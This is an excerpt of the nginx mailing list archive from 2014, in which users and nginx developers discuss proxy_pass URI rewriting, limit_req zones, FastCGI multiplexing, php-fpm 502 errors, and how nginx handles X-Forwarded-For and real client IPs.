the >> rewrite URL didn't works. >> >> Any hints? >> > > When you access it directly, what URI do you use? > > wbr, Valentin V. Bartenev > > _______________________________________________ nginx mailing list > nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx > -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBAgAGBQJUFBykAAoJEEyntV5BtO+QBloH/RS2fyv7C+RhFLRPZsN5gxB1 XHexEkM9aGo7JwIXAb9JzvkDp6Mm0IGky6v+zWZxZdtHuAWXG5wg29u1BCQvgiUI Zdd9jRfCswMyI4zN+JE7l89URtrGhWPjfqciV69rZApq5pKbaedYkEve8J4jZrL1 wseeWLe9BP3OlOtO/OmcmDL/bdqRgPrmNdnKssAYJ5RXt0QlGpbD2JMqc5K9c8sQ t6fwBLKZrjyJsajUE9tY6K0N2xkLTeBkBEvkX16jrdz7Q6xtTysGFm2LrpXSxnAr 8zuCR1Gjt1HuVxwtQD7bW5PlvgTd6x7vG1iT2/nacdt89WVXz1DOmwokCYuxC3I= =8w6/ -----END PGP SIGNATURE----- From vbart at nginx.com Sat Sep 13 10:42:33 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Sat, 13 Sep 2014 14:42:33 +0400 Subject: Could Nginx redirected proxied traffic? In-Reply-To: <54141CA5.1070703@xtremenitro.org> References: <54141290.70300@xtremenitro.org> <11383775.5OveutF6HL@vbart-laptop> <54141CA5.1070703@xtremenitro.org> Message-ID: <3235863.PgbdDxD1Zm@vbart-laptop> On Saturday 13 September 2014 17:29:57 Dewangga wrote: > Hi, > > The original URI is : > > http://engine.xtremenitro.org:6800/jobs > http://engine.xtremenitro.org:6800/logs > > .. etc > > And if proxied, should be: > http://engine.xtremenitro.org/monitor/jobs > http://engine.xtremenitro.org/monitor/logs > > .. etc > > I want to close the unusual port, and proxied to nginx. So I can > control the logs only from nginx. > > Is it possible? > First of all, with your config: location /monitor { proxy_pass http://backend:6800/; proxy_redirect default; } "/monitor" part of URI is replaced with "/", so requesting "/monitor/logs/" results in a request to "//logs/", and I'm not sure that your backend is able to handle that. Please, check the documentation: http://nginx.org/r/proxy_pass Probably, all you need is just this: location /monitor/ { proxy_pass http://backend:6800/; } wbr, Valentin V. Bartenev > On 09/13/2014 05:29 PM, Valentin V. Bartenev wrote: > > On Saturday 13 September 2014 16:46:56 Dewangga wrote: > >> Hi, > >> > >> I have configuration like this : > >> > >> ... snip ... location /monitor { proxy_pass > >> http://backend:6800/; proxy_redirect default; } ... snip ... > >> > >> Trying to access /monitor, it's works. But, I tried to access > >> URL behind them, /monitor/logs/, /monitor/jobs/ it's error 404, > >> the log said : > >> > >> ip.ad.dr.es - - [13/Sep/2014:16:42:35 +0700] "GET /logs/ > >> HTTP/1.1" 404 599 "http://engine.xtremenitro.org/monitor" > >> "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 > >> Firefox/31.0" ip.ad.dr.es - - [13/Sep/2014:16:45:24 +0700] "GET > >> /jobs HTTP/1.1" 404 599 "http://engine.xtremenitro.org/monitor" > >> "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 > >> Firefox/31.0" > >> > >> But, if I try to access them directly through port 6800 (traffic > >> not proxied from nginx), everything works. I assume, that > >> actually the backend support rewrite URL, but while proxied, the > >> rewrite URL didn't works. > >> > >> Any hints? > >> > > > > When you access it directly, what URI do you use? > > > > wbr, Valentin V. Bartenev > > > > _______________________________________________ nginx mailing list > > nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > From dewanggaba at xtremenitro.org Sat Sep 13 10:42:51 2014 From: dewanggaba at xtremenitro.org (Dewangga) Date: Sat, 13 Sep 2014 17:42:51 +0700 Subject: Could Nginx redirected proxied traffic? In-Reply-To: <3235863.PgbdDxD1Zm@vbart-laptop> References: <54141290.70300@xtremenitro.org> <11383775.5OveutF6HL@vbart-laptop> <54141CA5.1070703@xtremenitro.org> <3235863.PgbdDxD1Zm@vbart-laptop> Message-ID: <54141FAB.4030202@xtremenitro.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi bro, It works! Thanks in a bunch! On 09/13/2014 05:42 PM, Valentin V. Bartenev wrote: > On Saturday 13 September 2014 17:29:57 Dewangga wrote: >> Hi, >> >> The original URI is : >> >> http://engine.xtremenitro.org:6800/jobs >> http://engine.xtremenitro.org:6800/logs >> >> .. etc >> >> And if proxied, should be: >> http://engine.xtremenitro.org/monitor/jobs >> http://engine.xtremenitro.org/monitor/logs >> >> .. etc >> >> I want to close the unusual port, and proxied to nginx. So I can >> control the logs only from nginx. >> >> Is it possible? >> > > First of all, with your config: > > location /monitor { proxy_pass http://backend:6800/; proxy_redirect > default; } > > "/monitor" part of URI is replaced with "/", so requesting > "/monitor/logs/" results in a request to "//logs/", and I'm not > sure that your backend is able to handle that. > > Please, check the documentation: http://nginx.org/r/proxy_pass > > Probably, all you need is just this: > > location /monitor/ { proxy_pass http://backend:6800/; } > > wbr, Valentin V. Bartenev > >> On 09/13/2014 05:29 PM, Valentin V. Bartenev wrote: >>> On Saturday 13 September 2014 16:46:56 Dewangga wrote: >>>> Hi, >>>> >>>> I have configuration like this : >>>> >>>> ... snip ... location /monitor { proxy_pass >>>> http://backend:6800/; proxy_redirect default; } ... snip ... >>>> >>>> Trying to access /monitor, it's works. But, I tried to >>>> access URL behind them, /monitor/logs/, /monitor/jobs/ it's >>>> error 404, the log said : >>>> >>>> ip.ad.dr.es - - [13/Sep/2014:16:42:35 +0700] "GET /logs/ >>>> HTTP/1.1" 404 599 "http://engine.xtremenitro.org/monitor" >>>> "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 >>>> Firefox/31.0" ip.ad.dr.es - - [13/Sep/2014:16:45:24 +0700] >>>> "GET /jobs HTTP/1.1" 404 599 >>>> "http://engine.xtremenitro.org/monitor" "Mozilla/5.0 (X11; >>>> Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0" >>>> >>>> But, if I try to access them directly through port 6800 >>>> (traffic not proxied from nginx), everything works. I assume, >>>> that actually the backend support rewrite URL, but while >>>> proxied, the rewrite URL didn't works. >>>> >>>> Any hints? >>>> >>> >>> When you access it directly, what URI do you use? >>> >>> wbr, Valentin V. Bartenev >>> >>> _______________________________________________ nginx mailing >>> list nginx at nginx.org >>> http://mailman.nginx.org/mailman/listinfo/nginx >>> >> >> _______________________________________________ nginx mailing >> list nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> >> > > _______________________________________________ nginx mailing list > nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx > -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBAgAGBQJUFB+qAAoJEEyntV5BtO+QId4IAIRv2rg+rJuWG7iQkETKINHZ pS5tDgao7HpmerXi779iiiER/o/o/9dQ+kNtmMHktRp+AdFGDpQM0dgt1In79GbQ vA86hjMhPkboNMF0Ft5m30FS0tLQTEsn408Sh5MdRSr1REQ7llGZSIxzv8nGn9Ie 6qeOkIKuf/9Ooba+JMjP8lAZvEK7tO/OsajL02voCA9f76FFm5Gt+PGp7uoDtWWG WFKLjiEKjq6arhajU7gGMAWvjFYdSyEoGoxxFJ4mPUXQNHGI6xMk44S9D8aDqbJa hs1fJ9mIN4rXvJdQAYFE3w33KK9kEqAJnkSlwwTcQmtp2IVX7owQ0YytCXDYLTk= =j+fG -----END PGP SIGNATURE----- From nginx-forum at nginx.us Sat Sep 13 20:37:05 2014 From: nginx-forum at nginx.us (matt_l) Date: Sat, 13 Sep 2014 16:37:05 -0400 Subject: multiple limit_req_zone Message-ID: <54292c8b1fcc71fec9c100a6c42a312a.NginxMailingListEnglish@forum.nginx.org> Hello Please may I ask a question with respect to limit_req_zone to better understand how it works Can I have multiple limit_re_zone statements? limit_req_zone $binary_remote_addr zone=one:10m rate=10r/s; limit_req_zone $binary_remote_addr zone=two:10m rate=10r/s; Thank you Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253227,253227#msg-253227 From eliezer at ngtech.co.il Sat Sep 13 20:42:50 2014 From: eliezer at ngtech.co.il (Eliezer Croitoru) Date: Sat, 13 Sep 2014 23:42:50 +0300 Subject: "No space left on device" for temp cache - v1.7.4 In-Reply-To: References: <20140911143750.GZ59236@mdounin.ru> <4fc16d1afda3b103337beeef19a26d95.NginxMailingListEnglish@forum.nginx.org> Message-ID: <5414AC4A.2040805@ngtech.co.il> Or reiserfs... Eliezer On 09/12/2014 04:27 AM, NitrouZ wrote: > What file system do you use for cache? Try using xfs instead ext4. > Xfs have better inode storage than ext4. From vbart at nginx.com Sat Sep 13 20:48:10 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Sun, 14 Sep 2014 00:48:10 +0400 Subject: multiple limit_req_zone In-Reply-To: <54292c8b1fcc71fec9c100a6c42a312a.NginxMailingListEnglish@forum.nginx.org> References: <54292c8b1fcc71fec9c100a6c42a312a.NginxMailingListEnglish@forum.nginx.org> Message-ID: <15179956.xznibnbotN@vbart-laptop> On Saturday 13 September 2014 16:37:05 matt_l wrote: > Hello > > Please may I ask a question with respect to limit_req_zone to better > understand how it works > > Can I have multiple limit_re_zone statements? Of course, you can. > > limit_req_zone $binary_remote_addr zone=one:10m rate=10r/s; > limit_req_zone $binary_remote_addr zone=two:10m rate=10r/s; > This defines two separate memory zones with different names, where information about requests can be collected. Please note that these directives alone don't do anything useful. To actually apply the limit, you also need to specify the limit_req directive. See the documentation: http://nginx.org/en/docs/http/ngx_http_limit_req_module.html wbr, Valentin V. Bartenev From nginx-forum at nginx.us Sat Sep 13 22:07:31 2014 From: nginx-forum at nginx.us (matt_l) Date: Sat, 13 Sep 2014 18:07:31 -0400 Subject: multiple limit_req_zone In-Reply-To: <15179956.xznibnbotN@vbart-laptop> References: <15179956.xznibnbotN@vbart-laptop> Message-ID: <199df682b4157f8eb51a93398f48b4d7.NginxMailingListEnglish@forum.nginx.org> Valentin Thank you very much for your response. What would be a use case where one would define multiple limit_req_zone? For example, I would assume that the following limit_req_zone $binary_remote_addr zone=one:10m rate=10r/s; limit_req_zone $binary_remote_addr zone=two:10m rate=10r/s; is completely equivalent to limit_req_zone $binary_remote_addr zone=two:20m rate=10r/s; I am thinking that one would want to have multiple limit_req_zone if one wants different rates and zone sizes? On a separate note, how does one decides the size needed for zone? Thank you for your help Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253227,253230#msg-253230 From lists at ruby-forum.com Sat Sep 13 22:28:30 2014 From: lists at ruby-forum.com (Sam J.) Date: Sun, 14 Sep 2014 00:28:30 +0200 Subject: nginx as a forward proxy (kind of) Message-ID: <65918e4ea8fbcb834d4a93c1be8345bb@ruby-forum.com> Hi I am very new to nginx and have a quick question. I am using nginx to basically redirect certain websites through another proxy. I am using DNS to resolve *.domain.com to the IP address of nginx server. I am able to get it to work with www.domain.com (see sample config below) but would like it to redirect any subdomain (wildcard) to corresponding subdomain. Any way to do this without having a similar config for each subdomain? server { listen 192.168.1.80:443; server_name *.domain.com; ssl on; ssl_certificate /tmp/test_cert.crt; ssl_certificate_key /tmp/test_cert.key; access_log /var/log/nginx/log/www.example.access.log main; error_log /var/log/nginx/log/www.example.error.log; location / { proxy_pass https://www.domain.com; } } -- Posted via http://www.ruby-forum.com/. From vbart at nginx.com Sat Sep 13 23:13:02 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Sun, 14 Sep 2014 03:13:02 +0400 Subject: multiple limit_req_zone In-Reply-To: <199df682b4157f8eb51a93398f48b4d7.NginxMailingListEnglish@forum.nginx.org> References: <15179956.xznibnbotN@vbart-laptop> <199df682b4157f8eb51a93398f48b4d7.NginxMailingListEnglish@forum.nginx.org> Message-ID: <1443902.uLfRjDonPW@vbart-laptop> On Saturday 13 September 2014 18:07:31 matt_l wrote: > Valentin > > Thank you very much for your response. > > What would be a use case where one would define multiple limit_req_zone? > > For example, I would assume that the following > > limit_req_zone $binary_remote_addr zone=one:10m rate=10r/s; > limit_req_zone $binary_remote_addr zone=two:10m rate=10r/s; > > is completely equivalent to > > limit_req_zone $binary_remote_addr zone=two:20m rate=10r/s; > > I am thinking that one would want to have multiple limit_req_zone if one > wants different rates and zone sizes? Well, no. It's not an equivalent to one zone with bigger size. Can you see the difference between this config: limit_req_zone $binary_remote_addr zone=one:10m rate=10r/s; limit_req_zone $binary_remote_addr zone=two:10m rate=10r/s; server { server_name one.example.org; limit_rate zone=one burst=10; } server { server_name two.example.org; limit_rate zone=two burst=10; } and this one: limit_req_zone $binary_remote_addr zone=both:20m rate=10r/s; server { server_name one.example.org; limit_rate zone=both burst=10; } server { server_name two.example.org; limit_rate zone=both burst=10; } ? With the first configuration a client is able to request one.example.org and two.example.org with up to 10 rps at the same time. But with the last one the limitation is shared between servers, since they share the same limit zone. > > On a separate note, how does one decides the size needed for zone? > A quote from http://nginx.org/r/limit_req_zone | A client IP address serves as a key. Note that instead of | $remote_addr, the $binary_remote_addr variable is used here, | that allows decreasing the state size down to 64 bytes. | One megabyte zone can keep about 16 thousand 64-byte states. wbr, Valentin V. Bartenev From aircw2005 at gmail.com Sun Sep 14 04:18:19 2014 From: aircw2005 at gmail.com (Wei Chen) Date: Sat, 13 Sep 2014 21:18:19 -0700 Subject: How to measure time spent on response compression for Nginx? Message-ID: Hi folks: We want to measure how long Nginx takes to compress certain response with Gzip format. Is there any way/tool to get accurate timing? Thanks, -Wei From artemrts at ukr.net Sun Sep 14 16:08:24 2014 From: artemrts at ukr.net (wishmaster) Date: Sun, 14 Sep 2014 19:08:24 +0300 Subject: How to measure time spent on response compression for Nginx? In-Reply-To: References: Message-ID: <1410710869.546025443.gcgnc2nz@frv34.fwdcdn.com> --- Original message --- From: "Wei Chen" Date: 14 September 2014, 07:18:40 > Hi folks: > > We want to measure how long Nginx takes to compress certain response > with Gzip format. Is there any way/tool to get accurate timing? > You can find some information about gzip on Calome.Org website. https://calomel.org/nginx.html (see gzip_comp_level section) From lists at ruby-forum.com Sun Sep 14 19:22:48 2014 From: lists at ruby-forum.com (Wter S.) Date: Sun, 14 Sep 2014 21:22:48 +0200 Subject: Why Nginx Doesn't Implement FastCGI Multiplexing? In-Reply-To: <20130311121220.GX15378@mdounin.ru> References: <20130311121220.GX15378@mdounin.ru> Message-ID: Question about FastCGI: How it handle simultaneous connections with one process when PHP itself is blocking language ? What if I have something "sleep(100)" . Wont it block the process for the other users ? Thanks Maxim Dounin wrote in post #1101079: > Hello! > > On Sat, Mar 09, 2013 at 10:43:47PM +0800, Ji Zhang wrote: > >> >> But I also find an interesting article on how great this feature is, >> back to 2002: >> http://www.nongnu.org/fastcgi/#multiplexing > > This article seems to confuse FastCGI multiplexing with > event-based programming. Handling multiple requests in a single > process is great - and nginx does so. But you don't need FastCGI > multiplexing to do it. > >> and perform asynchronously. >> >> Does my point make sense? or some other more substantial reasons? > > You are correct, since FastCGI is used mostly for local > communication, multiplexing on application level isn't expected to > be beneficial. Another reason is that multiplexing isn't > supported (and probably will never be) by the major FastCGI > application - PHP. > > There were several discussions on FastCGI multiplexing here, and > general consensus seems to be that FastCGI multiplexing might > be useful to reduce costs of multiple long-polling connections to > an application, as it will reduce number of sockets OS will have > to maintain. It's yet to be demonstrated though. > > -- > Maxim Dounin > http://nginx.org/en/donation.html -- Posted via http://www.ruby-forum.com/. From mdounin at mdounin.ru Mon Sep 15 10:43:33 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 15 Sep 2014 14:43:33 +0400 Subject: Why Nginx Doesn't Implement FastCGI Multiplexing? In-Reply-To: References: <20130311121220.GX15378@mdounin.ru> Message-ID: <20140915104333.GH59236@mdounin.ru> Hello! On Sun, Sep 14, 2014 at 09:22:48PM +0200, Wter S. wrote: > Question about FastCGI: How it handle simultaneous connections with one > process when PHP itself is blocking language ? What if I have something > "sleep(100)" . Wont it block the process for the other users ? > Thanks FastCGI doesn't imply PHP (and, actually, PHP doesn't imply blocking as well - there are some event-driven PHP frameworks out there). As of now, implementation of the FastCGI protocol in PHP doesn't support FastCGI multiplexing at all, and that's one of the reasons why nginx doesn't implement FastCGI multiplexing as well. Quoting the message you've replied to: > > ... Another reason is that multiplexing isn't > > supported (and probably will never be) by the major FastCGI > > application - PHP. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Mon Sep 15 10:51:30 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 15 Sep 2014 14:51:30 +0400 Subject: 502 errors with nginx and php5-fpm In-Reply-To: <64d14f9fbecddd0a4f793c92e7886986.NginxMailingListEnglish@forum.nginx.org> References: <20140908115057.GA59236@mdounin.ru> <64d14f9fbecddd0a4f793c92e7886986.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140915105129.GI59236@mdounin.ru> Hello! On Thu, Sep 11, 2014 at 04:42:51PM -0400, nfn wrote: > Hi, > > Here is the debug log: http://pastebin.com/raw.php?i=w8Bwj4pS > > Can you help me understand why I have these random 502 error? As previously suggested, there is an error logged at "error" level: 2014/09/09 23:55:59 [error] 31744#0: *35461 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 0.0.0.0, server: www.example.com, request: "POST /index.php?app=members&module=messaging§ion=send&do=sendReply&topicID=54192 HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "www.example.com", referrer: "http://www.example.com/index.php?app=members&module=messaging§ion=view&do=showConversation&topicID=54192&st=200" As others already explained, the message suggestes there is something wrong with your backend, most likely it dies for some reason. -- Maxim Dounin http://nginx.org/ From r_o_l_a_n_d at hotmail.com Mon Sep 15 11:57:34 2014 From: r_o_l_a_n_d at hotmail.com (Roland RoLaNd) Date: Mon, 15 Sep 2014 14:57:34 +0300 Subject: trouble changing uri to query string Message-ID: i have a url looking as such: ?mysite.com/some/path/rest/v2/giveit.view&user=282&imageid=23&size=80 ?i want the cache key to match imageid=23&size=80 without the "user" part. $args isn't matching because incoming url lacks the "?" part, so $uri is detected as mysite.com/some/path/rest/v2/giveit.view&imageid=23&size=80 Is there a way i could force nginx to detect that query string, or rewrite/set the args on each request ? From nginx-forum at nginx.us Mon Sep 15 12:08:10 2014 From: nginx-forum at nginx.us (nkolev) Date: Mon, 15 Sep 2014 08:08:10 -0400 Subject: nginx chunked transfer encoding, cannot get it to work Message-ID: <67b49423c2351c8e547dd3b827386570.NginxMailingListEnglish@forum.nginx.org> I am using an implemention of nginx with jetty servlets. For the purpose of my project I need to initialize two connection to the jetty servlet and keep them open. To initialize the downlink I use a normal request and I get the inputstream back. To initialize the uplink I use a chunked encoding request. I use a 1.4.6 nginx version so the chunked encoding should be set by default, regardless I set it in my server definition. Here's the code for my server. #HTTPS server server { listen 443; listen [::]:443; server_name localhost; ssl on; ssl_certificate /etc/nginx/ssl/server.crt; ssl_certificate_key /etc/nginx/ssl/server.key; ssl_session_timeout 5m; ssl_protocols SSLv2 SSLv3 TLSv1; ssl_ciphers HIGH:!aNULL:!MD5; ssl_prefer_server_ciphers on; location / { proxy_http_version 1.1; expires off; proxy_buffering off; chunked_transfer_encoding on; proxy_pass https://127.0.0.1:8080; # root html; # index index.html index.htm; } } How can I get the nginx chunked transfer encoding downlink to work? I have also done simple tests to make that it's not my apps implementation that's blocking it somehow and it still doesn't work. Any ideas? Thanks :) Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253246,253246#msg-253246 From nginx-forum at nginx.us Mon Sep 15 13:11:37 2014 From: nginx-forum at nginx.us (ianjoneill) Date: Mon, 15 Sep 2014 09:11:37 -0400 Subject: Nginx real_ip_recursive Message-ID: <0dada9dd996a935b7cb504174698bc02.NginxMailingListEnglish@forum.nginx.org> Hello, I am using nginx to proxy connections to a server I have written in Java, which serves connections on port 8080. I am trying to use the X-Forwarded-For header to identify the real IP address of a connection, but I am running into difficulties with the nginx setting real_ip_recursive. My nginx config file example_vhost in /etc/nginx/sites-enabled/: server { listen *:80; server_name example.com; index index.html index.htm index.php; location / { proxy_pass http://127.0.0.1:8080; proxy_read_timeout 90; proxy_connect_timeout 90; proxy_redirect off; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; #proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; set_real_ip_from 127.0.0.1; real_ip_header X-Forwarded-For; real_ip_recursive on; } } This proxies requests onto my server as I expect, but I do not receive the correct IP address in the X-Forwarded-For header. If I connect to the server from a different IP address, spoofing the X-Forwarded-For header, I do not get the IP address of the machine, but rather get the spoofed addresses. Example with curl on client machine 10.0.2.2: $ curl -I --header "X-Forwarded-For: 1.1.1.1, 2.2.2.2" 10.0.2.15 Headers as received by my proxied Java server (extracted using tcpdump) on server machine 10.0.2.15: $ sudo /usr/sbin/tcpdump -i lo -A -s 0 'tcp port 8080 and ( ((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on lo, link-type EN10MB (Ethernet), capture size 65535 bytes 13:50:13.338901 IP localhost.50997 > localhost.8080: Flags [P.], seq 3051450771: 3051450976, ack 3527489033, win 4099, options [nop,nop,TS val 1891289 ecr 189128 9], length 205 E....M at .@............5"...q..A6 ........... ........HEAD / HTTP/1.0 Host: localhost X-Real-IP: 10.0.2.2 Connection: close User-Agent: curl/7.30.0 Accept: */* X-Forwarded-For: 1.1.1.1, 2.2.2.2 I assume I have got the nginx configuration wrong, but I am not sure how. I am using nginx/1.6.1 on debian Wheezy 7.6, and the output of nginx -V includes --with-http_realip_module. Thanks for any help in advance. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253247,253247#msg-253247 From mdounin at mdounin.ru Mon Sep 15 13:25:49 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 15 Sep 2014 17:25:49 +0400 Subject: Nginx real_ip_recursive In-Reply-To: <0dada9dd996a935b7cb504174698bc02.NginxMailingListEnglish@forum.nginx.org> References: <0dada9dd996a935b7cb504174698bc02.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140915132549.GL59236@mdounin.ru> Hello! On Mon, Sep 15, 2014 at 09:11:37AM -0400, ianjoneill wrote: > Hello, > > I am using nginx to proxy connections to a server I have written in Java, > which serves connections on port 8080. I am trying to use the > X-Forwarded-For header to identify the real IP address of a connection, but > I am running into difficulties with the nginx setting real_ip_recursive. [...] > #proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; [...] > This proxies requests onto my server as I expect, but I do not receive the > correct IP address in the X-Forwarded-For header. If I connect to the server > from a different IP address, spoofing the X-Forwarded-For header, I do not > get the IP address of the machine, but rather get the spoofed addresses. In your configuration, "proxy_set_header X-Forwarded-For" is commented out. Therefore, the X-Forwarded-For header is passed unmodified to the backend. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Mon Sep 15 13:36:23 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 15 Sep 2014 17:36:23 +0400 Subject: nginx chunked transfer encoding, cannot get it to work In-Reply-To: <67b49423c2351c8e547dd3b827386570.NginxMailingListEnglish@forum.nginx.org> References: <67b49423c2351c8e547dd3b827386570.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140915133623.GM59236@mdounin.ru> Hello! On Mon, Sep 15, 2014 at 08:08:10AM -0400, nkolev wrote: > How can I get the nginx chunked transfer encoding downlink to work? Chunked transfer encoding is used automatically when needed (and allowed by a protocol used), and automatically decoded when a client or a backend server uses it. I suspect you in fact want something like "unbuffered upload" instead, not chunked transfer encoding. This is not something nginx currently supports, see here for details: http://trac.nginx.org/nginx/ticket/251 -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Mon Sep 15 13:41:21 2014 From: nginx-forum at nginx.us (ianjoneill) Date: Mon, 15 Sep 2014 09:41:21 -0400 Subject: Nginx real_ip_recursive In-Reply-To: <20140915132549.GL59236@mdounin.ru> References: <20140915132549.GL59236@mdounin.ru> Message-ID: <6d7a2fb527f297688c71192da9123f75.NginxMailingListEnglish@forum.nginx.org> Thanks for your reply. If I uncomment that line, the X-Forwarded-For header contains all of the IP addresses, as shown below: $ sudo /usr/sbin/tcpdump -i lo -A -s 0 'tcp port 8080 and ( ((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on lo, link-type EN10MB (Ethernet), capture size 65535 bytes 14:37:24.303617 IP localhost.50999 > localhost.8080: Flags [P.], seq 717883991:7 17884206, ack 1454594695, win 4099, options [nop,nop,TS val 2599031 ecr 2599030] , length 215 E...."@. at ............7".*. WV.Z............ .'.w.'.vHEAD / HTTP/1.0 Host: localhost X-Real-IP: 10.0.2.2 X-Forwarded-For: 1.1.1.1, 2.2.2.2, 10.0.2.2 Connection: close User-Agent: curl/7.30.0 Accept: */* i.e. I am getting the spoofed addresses and the real one. As I understood it, I should only get the real ip, i.e. 10.0.2.2. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253247,253250#msg-253250 From mdounin at mdounin.ru Mon Sep 15 15:12:45 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 15 Sep 2014 19:12:45 +0400 Subject: Nginx real_ip_recursive In-Reply-To: <6d7a2fb527f297688c71192da9123f75.NginxMailingListEnglish@forum.nginx.org> References: <20140915132549.GL59236@mdounin.ru> <6d7a2fb527f297688c71192da9123f75.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140915151245.GN59236@mdounin.ru> Hello! On Mon, Sep 15, 2014 at 09:41:21AM -0400, ianjoneill wrote: > Thanks for your reply. > > If I uncomment that line, the X-Forwarded-For header contains all of the IP > addresses, as shown below: > > $ sudo /usr/sbin/tcpdump -i lo -A -s 0 'tcp port 8080 and ( > ((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' > tcpdump: verbose output suppressed, use -v or -vv for full protocol decode > listening on lo, link-type EN10MB (Ethernet), capture size 65535 bytes > 14:37:24.303617 IP localhost.50999 > localhost.8080: Flags [P.], seq > 717883991:7 > 17884206, ack 1454594695, win 4099, options [nop,nop,TS val 2599031 ecr > 2599030] > , length 215 > E...."@. at ............7".*. > WV.Z............ > .'.w.'.vHEAD / HTTP/1.0 > Host: localhost > X-Real-IP: 10.0.2.2 > X-Forwarded-For: 1.1.1.1, 2.2.2.2, 10.0.2.2 > Connection: close > User-Agent: curl/7.30.0 > Accept: */* > > i.e. I am getting the spoofed addresses and the real one. As I understood > it, I should only get the real ip, i.e. 10.0.2.2. No, your understanding is wrong. The line in question will add the IP address of a client to the X-Forwarded-For list. It's up to a backend to either trust or not individual addresses in this list (and realip module is an example how this can be implemented). If you want nginx to pass only the IP of the client, without preserving previous contents of the X-Forwarded-For header, use $remote_addr variable instead of $proxy_add_x_forwarded_for: proxy_set_header X-Forwarded-For $remote_addr; Or just use X-Real-Ip as already set in your config to $remote_addr. -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Mon Sep 15 15:41:49 2014 From: nginx-forum at nginx.us (ianjoneill) Date: Mon, 15 Sep 2014 11:41:49 -0400 Subject: Nginx real_ip_recursive In-Reply-To: <20140915151245.GN59236@mdounin.ru> References: <20140915151245.GN59236@mdounin.ru> Message-ID: <3ef5270960b9138cdb3463d6daa02061.NginxMailingListEnglish@forum.nginx.org> Thanks for your explanation. If I were to later add load balancers in front of my proxy server, would the $remote_addr IP be correct (i.e. the client IP) or would it be the IP of the load balancer? Thanks again for your help. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253247,253255#msg-253255 From b.arenal at gmail.com Mon Sep 15 15:47:38 2014 From: b.arenal at gmail.com (Bryan Arenal) Date: Mon, 15 Sep 2014 09:47:38 -0600 Subject: Is symmetric routing required for a nginx deployment? Message-ID: Hi, I'm investigating reverse proxy and content caching servers for a deployment at work but our infrastructure is currently asymmetric where the server would only see the inbound half of the conversation. Does nginx require symmetric configuration in order to see the three-way handshake and the subsequent GET? Thanks! Bryan -------------- next part -------------- An HTML attachment was scrubbed... URL: From lists at ruby-forum.com Mon Sep 15 16:16:58 2014 From: lists at ruby-forum.com (Wter S.) Date: Mon, 15 Sep 2014 18:16:58 +0200 Subject: Why Nginx Doesn't Implement FastCGI Multiplexing? In-Reply-To: <20140915104333.GH59236@mdounin.ru> References: <20130311121220.GX15378@mdounin.ru> <20140915104333.GH59236@mdounin.ru> Message-ID: <5326f1134ec41677f09a751eddc15e9c@ruby-forum.com> Then how Nginx is able to handle thousands simultaneous requests (where some of them contains blocking IO operations) with only one process (or let say 10 processes) ? Thanks ! Maxim Dounin wrote in post #1157635: > Hello! > > On Sun, Sep 14, 2014 at 09:22:48PM +0200, Wter S. wrote: > > > FastCGI doesn't imply PHP > As of now, implementation of the FastCGI protocol in PHP doesn't > support FastCGI multiplexing at all, and that's one of the reasons > why nginx doesn't implement FastCGI multiplexing as well. > -- > Maxim Dounin > http://nginx.org/ -- Posted via http://www.ruby-forum.com/. From mdounin at mdounin.ru Mon Sep 15 19:14:48 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 15 Sep 2014 23:14:48 +0400 Subject: Nginx real_ip_recursive In-Reply-To: <3ef5270960b9138cdb3463d6daa02061.NginxMailingListEnglish@forum.nginx.org> References: <20140915151245.GN59236@mdounin.ru> <3ef5270960b9138cdb3463d6daa02061.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140915191448.GP59236@mdounin.ru> Hello! On Mon, Sep 15, 2014 at 11:41:49AM -0400, ianjoneill wrote: > Thanks for your explanation. If I were to later add load balancers in front > of my proxy server, would the $remote_addr IP be correct (i.e. the client > IP) or would it be the IP of the load balancer? By default it will be the IP of the load 